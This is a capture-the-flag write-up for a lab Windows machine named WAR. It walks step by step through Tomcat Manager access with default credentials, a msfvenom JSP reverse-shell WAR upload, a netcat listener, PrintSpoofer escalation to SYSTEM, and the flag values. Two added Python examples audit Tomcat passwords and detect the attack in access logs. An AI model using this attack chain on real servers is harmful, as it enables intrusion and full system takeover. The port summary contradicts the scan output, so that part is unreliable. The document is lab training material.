WAR
I successfully identified several devices on the local network, including the target machine at 192.168.88.11 with the MAC address 08:00:27:be:6e:1d. This is the crucial first step in identifying the target, as you can see below.
┌──(kali㉿kali)-[~]
└─$ sudo arp-scan -I eth0 --localnet
[sudo] password for kali:
Interface: eth0, type: EN10MB, MAC: 08:00:27:43:73:bc, IPv4: 192.168.88.7
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.88.5    00:e0:4c:69:66:4a    REALTEK SEMICONDUCTOR CORP.
192.168.88.1    d8:44:89:50:2d:a3    (Unknown)
192.168.88.6    00:d8:61:fa:c0:4a    Micro-Star INTL CO., LTD.
192.168.88.11   08:00:27:be:6e:1d    PCS Systemtechnik GmbH
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.260 seconds (113.27 hosts/sec). 4 responded
The successful ping responses confirmed that the Kali machine could communicate with the target machine at 192.168.88.11. This ensures the target is alive and responsive on the network, as you can see below.
┌──(kali㉿kali)-[~]
└─$ ping 192.168.88.11
PING 192.168.88.11 (192.168.88.11) 56(84) bytes of data.
64 bytes from 192.168.88.11: icmp_seq=1 ttl=128 time=1.55 ms
64 bytes from 192.168.88.11: icmp_seq=2 ttl=128 time=0.854 ms
^C
--- 192.168.88.11 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1022ms
rtt min/avg/max/mdev = 0.854/1.201/1.549/0.347 ms
First, we run nmap to start enumerating the ports, using this command:
┌──(root💀kali)-[/home/kali/Downloads]
└─# nmap -n -Pn -sV -vvv --open --min-rate 5000 -sC 192.168.88.11
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-01 18:00 CEST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:00
Completed NSE at 18:00, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:00
Completed NSE at 18:00, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:00
Completed NSE at 18:00, 0.00s elapsed
Initiating ARP Ping Scan at 18:00
Scanning 192.168.88.11 [1 port]
Completed ARP Ping Scan at 18:00, 0.10s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 18:00
Scanning 192.168.88.11 [1000 ports]
Discovered open port 8080/tcp on 192.168.88.11
Discovered open port 139/tcp on 192.168.88.11
Discovered open port 135/tcp on 192.168.88.11
Discovered open port 445/tcp on 192.168.88.11
Completed SYN Stealth Scan at 18:00, 0.88s elapsed (1000 total ports)
Initiating Service scan at 18:00
Scanning 4 services on 192.168.88.11
Completed Service scan at 18:00, 8.64s elapsed (4 services on 1 host)
NSE: Script scanning 192.168.88.11.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:00
Completed NSE at 18:00, 5.33s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:00
Completed NSE at 18:00, 0.06s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:00
Completed NSE at 18:00, 0.01s elapsed
Nmap scan report for 192.168.88.11
Host is up, received arp-response (0.00042s latency).
Scanned at 2025-05-01 18:00:05 CEST for 15s
Not shown: 654 closed tcp ports (reset), 342 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE       REASON          VERSION
135/tcp  open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 128 Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds? syn-ack ttl 128
8080/tcp open  http          syn-ack ttl 128 Apache Tomcat (language: en)
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/11.0.1
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
MAC Address: 08:00:27:BE:6E:1D (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 41295/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 57669/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 26441/udp): CLEAN (Timeout)
|   Check 4 (port 60222/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
|   date: 2025-05-02T02:00:14
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
|_clock-skew: 9h59m58s
| nbstat: NetBIOS name: WAR, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:be:6e:1d (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
| Names:
|   WAR<00>              Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WAR<20>              Flags: <unique><active>
| Statistics:
|   08:00:27:be:6e:1d:00:00:00:00:00:00:00:00:00:00:00
|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_  00:00:00:00:00:00:00:00:00:00:00:00:00:00
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:00
Completed NSE at 18:00, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:00
Completed NSE at 18:00, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:00
Completed NSE at 18:00, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.87 seconds
Raw packets sent: 1543 (67.876KB) | Rcvd: 659 (26.364KB)
The scripts also provided additional details such as the hostname (WAR), the workgroup (WORKGROUP), the MAC address, and the operating system (Windows). The discovery of the Tomcat web server on port 8080 was a key finding for the next steps. The scan revealed several open TCP ports with associated services, including:
- HTTP (8080)
- Kerberos (88)
- RPC (135)
- NetBIOS-SSN (139)
- SMB (445)
- RDP (3389)
Port and Service Enumeration: nmap revealed several open TCP ports on the target:
- 135 (msrpc)
- 139 (netbios-ssn)
- 445 (microsoft-ds)
- 8080 (http) running Apache Tomcat
The SMB ports (139, 445) and the Tomcat web server (8080) are points of interest for potential vulnerabilities.
Also, I observed that an entry 192.168.88.11 WAR existed in the /etc/hosts file. This file maps hostnames to IP addresses. By adding this entry, the target machine can be referred to as WAR instead of by its IP address in subsequent commands, as you can see below.
┌──(root💀kali)-[/home/kali/Downloads]
└─# nano /etc/hosts
┌──(root💀kali)-[/home/kali/Downloads]
└─# cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
192.168.88.11   WAR
# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
smbmap attempted to connect to the SMB service on the target anonymously. It detected the SMB service but encountered an error ("Error occurs while reading from remote(104)"). This often indicates that anonymous access is not allowed or that there is a network issue, as you can see below.
┌──(root💀kali)-[/home/kali/Downloads]
└─# smbmap -u "" -p "" -H 192.168.88.11
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[\] Checking for open ports... [*] Detected 1 hosts serving SMB
[|] Authenticating... [/] Authenticating... [*] Established 1 SMB connections(s) and 0 authenticated session(s)
[-] Authenticating... [!] Something weird happened on (192.168.88.11) Error occurs while reading from remote(104) on line 1015
[\] Closing connections.. [|] Closing connections.. [/] Closing connections.. [-] Closing connections.. [*] Closed 1 connections
netexec confirmed the Windows version and hostname (WAR) and indicated that SMB signing was not required. However, it also returned an error (STATUS_INVALID_PARAMETER) when trying to establish a session anonymously, reinforcing the likelihood that anonymous SMB access was restricted, as you can see below.
┌──(root💀kali)-[/home/kali/Downloads]
└─# netexec smb 192.168.88.11 -u '' -p ''
SMB 192.168.88.11 445 WAR [*] Windows 10 / Server 2019 Build 19041 x64 (name:WAR) (domain:WAR) (signing:False) (SMBv1:False)
SMB 192.168.88.11 445 WAR [-] WAR\: STATUS_INVALID_PARAMETER
┌──(root💀kali)-[/home/kali/Downloads]
└─# gobuster dir -u http://192.168.88.11:8080/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,bak
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.88.11:8080/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,bak
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/docs (Status: 302) [Size: 0] [--> /docs/]
/examples (Status: 302) [Size: 0] [--> /examples/]
/manager (Status: 302) [Size: 0] [--> /manager/]
We can see that gobuster found several interesting directories:
- /docs/ (Status: 302 - Redirect)
- /examples/ (Status: 302 - Redirect)
- /manager/ (Status: 302 - Redirect)
- /RELEASE-NOTES.txt (Status: 200 - OK)
Now we open the IP address with its port in the web browser (http://192.168.88.11:8080/) and find the web page you can see in the picture below.
Let's try a username and password, such as username: tomcat and password: tomcat. The login is denied, as you can see in the picture below.
Let's try another pair, username: admin and password: tomcat. This time the login is correct, as you can see in the picture below.
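An added example, not part of the original write-up: the admin / tomcat login works because an account with a Manager role had a guessable password, and a defender can audit conf/tomcat-users.xml for exactly that condition. The sample file, the weak-password list and the function names are constructed for illustration, and passwords are assumed to be stored in plaintext.

```python
import xml.etree.ElementTree as ET

# Roles that open the Tomcat Manager application; the first two permit WAR deployment.
DEPLOY_ROLES = {"manager-gui", "manager-script"}
MANAGER_ROLES = DEPLOY_ROLES | {"manager-jmx", "manager-status"}

# Constructed short list of guessable passwords (includes the one from this write-up).
WEAK_PASSWORDS = {"", "tomcat", "admin", "password", "manager", "s3cret", "changeme"}

# Constructed sample file, not taken from the target machine.
SAMPLE_USERS_XML = """\
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <user username="admin" password="tomcat" roles="manager-gui,admin-gui"/>
  <user username="deployer" password="kV9#x2!pQ7z$Lm4w" roles="manager-script"/>
  <user username="monitor" password="Monitor" roles="manager-status"/>
  <user username="app" password="tomcat" roles="app-user"/>
</tomcat-users>
"""


def _local(tag):
    """Drop the XML namespace so <user> matches with or without xmlns."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text):
    """Return one finding per Manager-capable account with a guessable password."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        if _local(el.tag) != "user":
            continue
        name = el.get("username", "")
        password = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        manager_roles = roles & MANAGER_ROLES
        if not manager_roles:
            continue  # account cannot reach /manager, out of scope here
        reasons = []
        if password.lower() in WEAK_PASSWORDS:
            reasons.append("password in weak list")
        if password.lower() == name.lower():
            reasons.append("password equals username")
        if reasons:
            findings.append({
                "user": name,
                "roles": sorted(manager_roles),
                "can_deploy": bool(manager_roles & DEPLOY_ROLES),
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in audit_tomcat_users(SAMPLE_USERS_XML):
        level = "HIGH" if f["can_deploy"] else "MEDIUM"
        print(f"[{level}] {f['user']} roles={f['roles']} -> {'; '.join(f['reasons'])}")
```

Accounts flagged with can_deploy are the ones that matter most here, because a Manager login with a deploy-capable role is equivalent to code execution as the Tomcat service user.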
Now we have discovered an option called manager, where further down the page we can upload a file with the .war extension.
Since I did not know this extension, I looked it up on Google: it is a Java file type, so we must create a reverse shell with the .war extension.
Now we have to confirm my Kali machine's IP address (192.168.88.7) on the eth0 interface. This was important for setting up the reverse shell later.
Now we have to create the reverse shell, using the command below. I successfully generated a shell.war file containing the JSP reverse TCP shell.
┌──(kali㉿kali)-[~]
└─$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.88.7 LPORT=4444 -f war -o shell.war
Payload size: 1088 bytes
Final size of war file: 1088 bytes
Saved as: shell.war
In addition, we must upload the WAR file we created earlier, as you can see in both pictures below. When this file is executed, we obtain a reverse shell on our attacker machine. For that, we need to open a listener on the same port we set earlier with msfvenom, as you can see below.
┌──(kali㉿kali)-[~]
└─$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [192.168.88.7] from (UNKNOWN) [192.168.88.11] 51973
Microsoft Windows [Version 10.0.19045.2965]
(c) Microsoft Corporation. All rights reserved.
Once the shell.war file was successfully deployed on the Tomcat server, accessing it (likely through a specific URL like /shell/) triggered the execution of the JSP. The target machine then connected back to the listener, giving a command shell on the target.
C:\Program Files\Apache Software Foundation\Tomcat 11.0>dir
dir
Volume in drive C has no label.
Volume Serial Number is 380E-880B
Directory of C:\Program Files\Apache Software Foundation\Tomcat 11.0
12/06/2024 02:58 PM <DIR> .
12/06/2024 02:58 PM <DIR> ..
12/06/2024 02:58 PM <DIR> bin
12/06/2024 02:58 PM <DIR> conf
12/06/2024 02:58 PM <DIR> lib
11/06/2024 12:08 PM 61,666 LICENSE
05/01/2025 07:14 PM <DIR> logs
11/06/2024 12:08 PM 2,401 NOTICE
11/06/2024 12:08 PM 6,631 RELEASE-NOTES
12/06/2024 02:58 PM <DIR> temp
11/06/2024 12:08 PM 21,630 tomcat.ico
11/06/2024 12:08 PM 85,632 Uninstall.exe
05/01/2025 07:23 PM <DIR> webapps
12/06/2024 02:58 PM <DIR> work
5 File(s) 177,960 bytes
9 Dir(s) 32,189,415,424 bytes free
C:\Program Files\Apache Software Foundation\Tomcat 11.0>
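An added detection example, not part of the original write-up: the Manager login, the WAR upload and the first request to the newly deployed application all leave entries in Tomcat's access log. The sketch below assumes the "common" access log pattern; the log lines, alert names, baseline list and 10-minute window are constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LINE = re.compile(
    r'(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)
# Manager endpoints that accept a WAR: HTML upload form and text interface.
DEPLOY = re.compile(r"^/manager/(?:html/upload|text/deploy)\b")
WINDOW = timedelta(minutes=10)
# Contexts shipped with a default Tomcat install; extend with your own applications.
BASELINE = ("/", "/docs", "/examples", "/manager", "/host-manager")

# Constructed log lines modelled on the sequence in this write-up.
SAMPLE_LOG = """\
192.168.88.7 - - [01/May/2025:19:20:11 +0000] "GET /manager/html HTTP/1.1" 401 1187
192.168.88.7 - - [01/May/2025:19:20:25 +0000] "GET /manager/html HTTP/1.1" 401 1187
192.168.88.7 - admin [01/May/2025:19:21:02 +0000] "GET /manager/html HTTP/1.1" 200 14532
192.168.88.7 - admin [01/May/2025:19:23:40 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=CONSTRUCTED HTTP/1.1" 200 16010
192.168.88.7 - - [01/May/2025:19:23:58 +0000] "GET /shell/ HTTP/1.1" 200 3
192.168.88.6 - - [01/May/2025:19:24:30 +0000] "GET /docs/ HTTP/1.1" 200 15000
""".splitlines()


def parse(line):
    """Parse one access log line into a dict, or return None if it does not match."""
    m = LINE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%d/%b/%Y:%H:%M:%S %z")
    ev["status"] = int(ev["status"])
    # First path segment is the web application context ("/shell/x.jsp" -> "/shell").
    ev["context"] = "/" + ev["path"].split("?")[0].lstrip("/").split("/")[0]
    return ev


def detect(lines, baseline=BASELINE):
    """Return (alert, ip, detail) tuples for the login / deploy / new-context chain."""
    alerts, seen, failed, last_deploy = [], set(baseline), {}, None
    for ev in filter(None, map(parse, lines)):
        ip, ok = ev["ip"], ev["status"] < 400
        if ev["context"] == "/manager":
            if ev["status"] == 401:
                failed[ip] = failed.get(ip, 0) + 1
            elif ok and failed.pop(ip, 0):
                alerts.append(("manager-login-after-failures", ip, ev["user"]))
        if ok and ev["method"] in ("POST", "PUT") and DEPLOY.match(ev["path"]):
            last_deploy = ev["ts"]
            alerts.append(("war-deploy", ip, ev["user"]))
        elif ok and ev["context"] not in seen:
            # A context never served before that appears right after a deploy.
            if last_deploy and timedelta(0) <= ev["ts"] - last_deploy <= WINDOW:
                alerts.append(("new-context-after-deploy", ip, ev["context"]))
        if ok:
            seen.add(ev["context"])
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```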
Now we confirm that we are in the Tomcat installation directory and identify the privileges of the Tomcat service user. The presence of SeImpersonatePrivilege is a critical finding, indicating a potential privilege escalation path that lets me escalate privileges as if I were SYSTEM. To check this, we run the whoami /priv command, as you can see below.
C:\Program Files\Apache Software Foundation\Tomcat 11.0>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeSystemtimePrivilege         Change the system time                    Disabled
SeShutdownPrivilege           Shut down the system                      Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled
Now we have to download the PrintSpoofer64.exe exploit, which is known to leverage the SeImpersonatePrivilege to gain SYSTEM-level access, as you can see below.
┌──(kali㉿kali)-[~]
└─$ wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe
--2025-05-01 18:33:26-- https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe
Resolving github.com (github.com)... 140.82.121.4
Connecting to github.com (github.com)|140.82.121.4|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/259576481/816ce080-f39e-11ea-8fc2-8afb7b4f4821?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250501%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250501T163327Z&X-Amz-Expires=300&X-Amz-Signature=731fc5e8b919863fd643ff9001e91207ae97db2adc8a8c287dc89e16edbbe8aa&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3DPrintSpoofer64.exe&response-content-type=application%2Foctet-stream [following]
--2025-05-01 18:33:27-- https://objects.githubusercontent.com/github-production-release-asset-2e65be/259576481/816ce080-f39e-11ea-8fc2-8afb7b4f4821?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250501%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250501T163327Z&X-Amz-Expires=300&X-Amz-Signature=731fc5e8b919863fd643ff9001e91207ae97db2adc8a8c287dc89e16edbbe8aa&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3DPrintSpoofer64.exe&response-content-type=application%2Foctet-stream
Resolving objects.githubusercontent.com (objects.githubusercontent.com)... 185.199.108.133, 185.199.110.133, 185.199.109.133, ...
Connecting to objects.githubusercontent.com (objects.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 27136 (26K) [application/octet-stream]
Saving to: ‘PrintSpoofer64.exe’
PrintSpoofer64.exe 100%[====================>] 26.50K --.-KB/s in 0.02s
2025-05-01 18:33:28 (1.08 MB/s) - ‘PrintSpoofer64.exe’ saved [27136/27136]
Now we set up a temporary SMB server on our Kali machine, making the files in our current directory accessible to the target machine with the command below.
┌──(kali㉿kali)-[~]
└─$ sudo impacket-smbserver reverse_shell $(pwd) -smb2support
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (192.168.88.11,51978)
[*] AUTHENTICATE_MESSAGE (\,WAR)
[*] User WAR\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:reverse_shell)
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:reverse_shell)
[*] Closing down connection (192.168.88.11,51978)
[*] Remaining connections []
In addition, the PrintSpoofer64.exe file was successfully copied to the Tomcat installation directory on the target with the command below.
C:\Program Files\Apache Software Foundation\Tomcat 11.0>copy \\192.168.88.7\reverse_shell\PrintSpoofer64.exe PrintSpoofer64.exe
copy \\192.168.88.7\reverse_shell\PrintSpoofer64.exe PrintSpoofer64.exe
1 file(s) copied.
To verify that the file is there, we run this command:
- dir (lists the files and programs in the current directory)
C:\Program Files\Apache Software Foundation\Tomcat 11.0>dir
dir
Volume in drive C has no label.
Volume Serial Number is 380E-880B
Directory of C:\Program Files\Apache Software Foundation\Tomcat 11.0
05/01/2025 07:42 PM <DIR> .
05/01/2025 07:42 PM <DIR> ..
12/06/2024 02:58 PM <DIR> bin
12/06/2024 02:58 PM <DIR> conf
12/06/2024 02:58 PM <DIR> lib
11/06/2024 12:08 PM 61,666 LICENSE
05/01/2025 07:14 PM <DIR> logs
11/06/2024 12:08 PM 2,401 NOTICE
12/07/2021 05:57 AM 27,136 PrintSpoofer64.exe
11/06/2024 12:08 PM 6,631 RELEASE-NOTES
12/06/2024 02:58 PM <DIR> temp
11/06/2024 12:08 PM 21,630 tomcat.ico
11/06/2024 12:08 PM 85,632 Uninstall.exe
05/01/2025 07:23 PM <DIR> webapps
12/06/2024 02:58 PM <DIR> work
6 File(s) 205,096 bytes
9 Dir(s) 32,155,258,880 bytes free
Now that PrintSpoofer64.exe is on the target, we need to know how to run it, so we use the -h parameter to see the different options.
C:\Program Files\Apache Software Foundation\Tomcat 11.0>PrintSpoofer64.exe -h
PrintSpoofer64.exe -h
PrintSpoofer v0.1 (by @itm4n)
Provided that the current user has the SeImpersonate privilege, this tool will leverage the Print Spooler service to get a SYSTEM token and then run a custom command with CreateProcessAsUser()
Arguments:
-c <CMD> Execute the command *CMD*
-i Interact with the new process in the current command prompt (default is non-interactive)
-d <ID> Spawn a new process on the desktop corresponding to this session *ID* (check your ID with qwinsta)
-h That's me :)
Examples:
- Run PowerShell as SYSTEM in the current console
PrintSpoofer.exe -i -c powershell.exe
- Spawn a SYSTEM command prompt on the desktop of the session 1
PrintSpoofer.exe -d 1 -c cmd.exe
- Get a SYSTEM reverse shell
PrintSpoofer.exe -c "c:\Temp\nc.exe 10.10.13.37 1337 -e cmd"
As we can see, these are the options:
Arguments:
-c <CMD> Execute the command *CMD*
-i Interact with the new process in the current command prompt (default is non-interactive)
-d <ID> Spawn a new process on the desktop corresponding to this session *ID* (check your ID with qwinsta)
-h That's me :)
And we must use this command: PrintSpoofer64.exe -i -c powershell, as you can see below.
Try the new cross-platform PowerShell https://aka.ms/pscore6
The exploit successfully leveraged the SeImpersonatePrivilege to spawn a new PowerShell process running as nt authority\system, achieving privilege escalation to the highest level on the Windows machine.
To finish this machine, we have to find both flags, the user flag and the root flag, which are normally hidden in these paths:
- C:\Users\user\user.txt
- C:\Users\user\root.txt
PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32>
PS C:\Windows\system32> cd C:\Users\
cd C:\Users\
PS C:\Users> dir
dir
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/6/2024 1:21 PM Administrator
d----- 12/6/2024 4:00 AM low
d-r--- 12/6/2024 3:58 AM
PS C:\Users> cd low
cd low
PS C:\Users\low> dir
dir
Directory: C:\Users\low
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 12/6/2024 3:58 AM 3D Objects
d-r--- 12/6/2024 3:58 AM Contacts
d-r--- 12/6/2024 4:33 PM Desktop
d-r--- 12/6/2024 3:58 AM Documents
d-r--- 12/6/2024 3:58 AM Downloads
d-r--- 12/6/2024 3:58 AM Favorites
d-r--- 12/6/2024 3:58 AM Links
d-r--- 12/6/2024 3:58 AM Music
d-r--- 12/6/2024 4:00 AM OneDrive
d-r--- 12/6/2024 4:00 AM Pictures
d-r--- 12/6/2024 3:58 AM Saved Games
d-r--- 12/6/2024 3:59 AM Searches
d-r--- 12/6/2024 3:58 AM Videos
PS C:\Users\low> cd Desktop
cd Desktop
PS C:\Users\low\Desktop> dir
dir
Directory: C:\Users\low\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/6/2024 4:23 PM 35 user.txt
We have just discovered the first flag, the user flag, which is located in C:\Users\low\Desktop. To read it, we run Get-Content followed by the file name (Get-Content user.txt).
PS C:\Users\low\Desktop> Get-Content user.txt
Get-Content user.txt
3a1ddb915bd423f0ca428dce35612dcb
PS C:\Users\low\Desktop>
PS C:\Users\low> cd ..
cd ..
PS C:\Users> dir
dir
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/6/2024 1:21 PM Administrator
d----- 12/6/2024 4:00 AM low
d-r--- 12/6/2024 3:58 AM Public
PS C:\Windows\system32> cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop
PS C:\Users\Administrator\Desktop> dir
dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/6/2024 4:30 PM 35 root.txt
We have just discovered the second flag, the root flag, which is located in C:\Users\Administrator\Desktop. To read it, we run Get-Content followed by the file name (Get-Content root.txt).
PS C:\Users\Administrator\Desktop> Get-Content root.txt
Get-Content root.txt
1399d5ba705df14146335def4ff64520
Thank you very much for reading this article. I hope you liked it and learned something new. This article was written for ethical purposes. Good Hack